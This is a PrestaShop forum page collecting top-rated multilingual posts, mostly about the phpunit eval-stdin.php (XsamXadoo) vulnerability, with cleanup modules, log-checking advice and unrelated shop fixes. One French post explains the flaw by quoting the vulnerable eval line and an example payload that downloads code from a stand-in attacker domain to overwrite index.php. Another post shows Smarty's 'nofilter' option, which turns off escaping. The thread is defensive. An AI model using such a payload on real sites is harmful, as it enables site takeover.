Leaderboard
Popular Content
Showing content with the highest reputation on 01/08/2020 in all areas
-
We have developed a free module M4 Check for vulnerabilities which you can use to check all directories against the XsamXadoo vulnerability. See https://build.prestashop.com/news/critical-security-vulnerability-in-prestashop-modules/. It is translated to 7 languages. Download the latest version at https://www.presta-addons.com/free/m4check.zip without registration. m4check-1.0.0.zip2 points
-
Si un modérateur peut clore ce topic, je pense que tout a été dit et que les infos sont assez complètes. Inutile de laisser le premier venu poster des liens vers des modules inutiles ici Merci2 points
-
Nous venons de faire un module rapide qui permet de vérifier et patcher si nécessaire la faille. Vous pouvez le télécharger gratuitement pour corriger. ec_cleanphpunit.zip2 points
-
Opracowałem sobie prosty moduł, dodający do sklepu możliwość wyboru paczkomatu zgodnie ze specyfikacją Geowidget v4. Moduł po instalacji tworzy nowego przewoźnika, którego trzeba skonfigurować i aktywować (uwaga! nie kasować go bo będzie trzeba przeinstalować moduł). Następnie w procesie zamówienia przy tym przewoźniku pojawia się możliwość wyboru paczkomatu, który potem jest widoczny na karcie zamówienia w sekcji Wysyłka. Moduł na sklepie demo Zapraszam do testowania i zgłaszania uwag! Moduł dla wersji minimum 1.7. Aby pobrać moduł trzeba być zalogowanym na forum, najlepiej pobrać zawsze wersję najnowszą. gmparcellocker_1_0_0.zip Aktualizacja - wersja 1.1.0 Dwie nowe funkcje: dostępna zmienna {gmparcellocker}, którą można wykorzystać w szablonach maili order_conf i new_order opcja zamiany adresu dostawy na adres paczkomatu - uwaga! aby ta zamiana była widoczna wszędzie, najlepiej żeby moduł był pierwszy podpięty na hooku actionValidateOrder gmparcellocker_1_1_0.zip Aktualizacja - wersja 1.2.0 Integracja z Baselinkerem - aby dane paczkomatu pokazywały się jako punkt odbioru. Przy integracji przez API po instalacji modułu trzeba w ustawieniach klucza API zaznaczyć wszystkie uprawnienia dla zasobu bl_order. Powinna działać również integracja przez plik (z informacji od użytkowników Baselinker uwzględnia moduł przy tym sposobie integracji) gmparcellocker_1_2_0.zip Aktualizacja - wersja 1.2.1 Lekko zmieniony sposób wyświetlania przycisku uruchamiającego mapę, aby umożliwić współpracę modułu z modułem One Page Checkout. Aby to działało konieczne może być włączenie opcji "Włącz kompatybilność z modułami wysyłkowymi" w module OPC. gmparcellocker_1_2_1.zip Aktualizacja - wersja 1.2.2 Dodana poprawka wprowadzona przez autorów modułu SuperCheckout + parę zmian kosmetycznych w kodzie. gmparcellocker_1_2_2.zip Aktualizacja - wersja 1.3.0 Nowa funkcja - możliwość ustawienia sposobu wyświetlania wyboru paczkomatu - okno modal lub lista rozwijana gmparcellocker_1_3_0.zip Aktualizacja - wersja 1.3.1 Dodane zmiany wprowadzone przez autorów jeszcze kolejnego modułu OPC, zmiana w tłumaczeniach na "Paczkomaty 24/7" gmparcellocker_1_3_1.zip Aktualizacja - wersja 1.4.0 Możliwość wyświetlenia informacji o wybranym paczkomacie w dowolnym miejscu w szablonie. Robimy to za pomocą widgetu: {widget name='gmparcellocker'} gmparcellocker_1_4_0.zip Aktualizacja - wersja 1.4.1 Dodane tworzenie drugiego przewoźnika - "Paczkomaty 24/7 w weekend", przewoźnik działa na takiej samej zasadzie jak podstawowy, tylko dla wyboru paczkomatu na mapie (nie jako lista rozwijana) gmparcellocker_1_4_1.zip Aktualizacja - wersja 1.4.3 Drobne poprawki na podstawie dyskusji tu na forum gmparcellocker_1_4_3.zip Aktualizacja - wersja 1.4.4 Unikanie konfliktu z modułem Baselinker, kasowanie danych z bazy w sytuacji gdy klient się rozmyśli i wybierze dla zamówienia innego kuriera. gmparcellocker_1_4_4.zip Aktualizacja - wersja 1.4.5 Tworzenie nowego przewoźnika "Paczkomaty 24/7 pobranie". Nie różni się niczym innym od zwykłego i weekendowego poza nazwą. Zrobione jest to przy założeniu, że każdy paczkomat może być pobraniowy. gmparcellocker_1_4_5.zip Aktualizacja - wersja 1.4.6 Drobne poprawki związane z przekazywaniem zamówień do BL. gmparcellocker_1_4_6.zip1 point
-
In prestashop 1.7.2 we wanted to display final price with taxes in the product order details. We want to share this solution with you. Open for editing /document-root/adminfolder/themes/default/template/controllers/orders/ _product_line.tpl Add the following lines at the beginning of the file before {* Assign product price *} {* Assign retail product price wit taxes *} {assign var=product_price_retail value=$product['price'] * (($product['tax_rate']/100) +1)} Then change the variable in about line 60. <span class="product_price_show">{displayPrice price=$product_price_retail currency=$currency->id}</span>1 point
-
Hi, I propose this new free module to facilitate sharing modules translations between admin and merchants A lot of modules come with no translation for several languages which makes it time consuming to translate them This module allows you to import a module translation for the desired language and to also share it if it doesn't exist yet How to install To install the module, open the Modules page and click Upload a module then upload the attached zip file How to use Start by opening the module translation page then import one of the existing translations or share your translation Make sure that the translation you share doesn't contain sensitive or offensive information Rating the translations You can rate a translation by pressing the thumbs up or thumbs down buttons How to import a translation First click on the translation then choose the options If you choose to overwrite all fields, then the module will replace the already filled fields and it will replace your translation The module will not save the translation automatically so you can take your time to verify it carefully (since version 2.0.0, the translation is saved directly) The module also displays the translation progress so you can pick the most complete translation ⏬ Download transhare-2.0.1.zip Support and feedback If you encounter any issue or have any feedback, don't hesitate to post in this thread More modules Feel free to check my PrestaShop modules on PrestaShop Addons transhare-2.0.1.zip1 point
-
Think from version 1.6.1.18 you can switch to PHP 7.0 with no issues and that gives some boost in speed. So yes 5.6 for your version. Good luck with hosting company and hope you resolve issue soon enough.1 point
-
Ton module ne détecte avec certitude quasiment rien. Tu effaces les répertoire phpunit de vendor, rien dans modules (les plus dangereux d'ailleurs) Ton module détecte seulement si le site a été pénétré par les blaireaux qui se contentent de se faire mousser en mettant une page disant "Nous sommes les hackers du Bengladesh wesh wesh" Les vrais hackers ne font pas cela. Ils déposent de nouvelles portes de pénétration (qu'il n'utilisent pas immédiatement d'ailleurs), injectent un site phising, un autre bot de brute force attack, un spam bot, cassent les controles de mot de passe, volent la bdd, ... Je rappelle quand même à tous les autres qu'au titre de la RGPD, vous devez si des fichiers eval-stdin.php on été présent sur votre site vous devez considérer avoir fuité des données privées de vos client. Vous avez donc 48h pour les informer que leur vie privée est compromise. C'est la loi1 point
-
Bon alors on va clairement regarder ce que contenait le eval-stdin.php avant: eval('?>' . \file_get_contents('php://stdin')); Autrement dit n'importe quel contenu post était executé. Donc si le corps du post contenu file_put_contents('../../../../../../../../../index.php',file_get_contents('http://mon-domaine-warez.ru/super-hack')); Tout le contenu du fichier super-hack remplace le fichier index.php Donc il est totalement impossible de faire un module qui fasse le nettoyage, seul un humain, doté d'un cerveau peut le faire.1 point
-
Free module for ps 1.6 and 1.7 to remove phpunit folders and infected files.1 point
-
Je rapelle que le plus simple est de configurer un filtre fail2ban http://area51.enter-solutions.com/snippets/811 point
-
C'est surtout que ceux qui écrivent du code à la va-vite ont comme objectif de récolter au plus vite les adresses mails avec leurs modules gratos, comme quoi l'urgence est une bonne technique sur le plan marketing.1 point
-
Euh... @ttoine, même si c'est modules ne font le job qu'à moitié la décence demanderait d'éviter ce genre de remarques vu l'origine de l'infection actuelle... Celle-ci est arrivée grâce à des modules Prestashop, distribués par Prestashop et auteur Prestashop donc l'origine ne protège en rien. (Et pour cartabandomnentpro, c'est quand même la 2ème fois). Des excuses auraient surtout été bienvenues et j'ose espérer qu'avant de mettre quoi que ce soit en ligne, un comité de contrôle validera l'ensemble des fichiers proposés à l'avenir. Pour ceux qui airaient des traces en POST, recherchez en priorité ces 2 fichiers sur votre serveur: - Xsam_Xadoo.html - XsamXadoo_deface.php S'ils sont présents, supprimez-les immédiatement1 point
-
Cela signifie que ce fichier existait avant et que le hacker tente d'y accéder. Si l'url était connue et exploitée il faut rechercher sur votre ftp les fichiers éventuellement ajoutés par le hacker.1 point
-
Bonjour à tous, Je viens de supprimer le dossier phpunit d'un module (ps_facetedsearch/vendor/phpunit) et je suis en train de consulter les logs. Avez-vous une idée de jusqu'à quand il faut remonter dans cette consultation. J'ai vu que l'alerte datait du 2 janvier. Faut-il remonter en décembre? Merci d'avance pour votre retour Jérôme1 point
-
Donc si je comprends bien, dans l'idée si je vérifie mes logs et que je fais un bête "ctrl+F" en tapant "phpunit" je verrais si qqun a tenté d'accéder à mes logs en faisant un "get phpunit" et si oui ou non on est possiblement infectés ? QUID de la fiabilité des modules envoyés sur ce fil de discussion ?1 point
-
Mi na dłuższą metę nie wystarczy, ale na chwilę obecną jak najbardziej ratuje mi 4 litery ;). Fajnie, że jest coś takiego za darmo.1 point
-
Dla niektórych w zupełności wystarczy. Dziękuje za Twoja pracę.1 point
-
Sziasztok! A class folderben a mail.php 471 -es sorában cseréld le ezt: $subject = '[' . Tools::safeOutput($configuration['PS_SHOP_NAME']) . '] ' . $subject; Erre: $nombre = $configuration['PS_SHOP_NAME']; $subject = '[' . $nombre . '] ' . $subject; És jó, bugreportban benne, nex update javítja.1 point
-
Nous avons remis en ligne le module qui permet de corriger très facilement la faille pour ceux qui le souhaite, il est gratuit : ec_cleanphpunit.zip1 point
-
Gelukt om het op te lossen. Was iets heel kleins. De Shop stond op Catalogusmode. Hoe, waarom, geen idee. (Maar nu dus opgelost via Winkelinstellingen ==> Producten ==> Catalogusmode (Zet deze op nee))1 point
-
Rozwiązaniem jest zamiana w AdminController.php linii $translated = $this->translator->trans($string); na $translated = Context::getContext()->getTranslator()->trans($string); Zostawię temat może komuś się kiedyś przyda1 point
-
ozaman çözümü buraya yaz, Başkalarıda aynı sorunu yaşarsa burda okur.1 point
-
Delete via FTP all content of /var/cache/. This folder will regenerates itself. You are having problems with cache generated from one server to another, i.e. from PS-version to another. BTW if you pretend to update your Prestashop take into consideration to upgrade the mySQL and php-version on your server as well. php 5.6. is end of life. You should upgrade to php 7 series and mySQL 5.7 or mariaDB 10. See tested server configuration for shops in production here:1 point
-
@stoosh @claus@side-walk.dk @lototo Just got the answer from the IQIT. Here it is: "Ignore it it is because some connections to official addons where there is different version of module dedicated for other themes than warehouse. This message should not be showed, it is related to some recent changes in PS addons. This notification should be not showed to you. However, menu in warehouse template is modified With next theme upgrade there will be fix so upgrade from addons will be not showed, but for now you just need to ignore that message and not try to upgrade." Hope it will be helpful for you and the others. Cheers!1 point
-
Oupss, ajoute cette colonne : https://gyazo.com/59b0d1ab63147687bc733b00de51f5e6 Dans la table admin_filter1 point
-
This is by design. In PrestaShop v1.7, all Smarty variables are automatically escaped, so you no longer need to manually escape them. You can tell Smarty not to escape your variable by adding nofilter like this: {$variable nofilter}1 point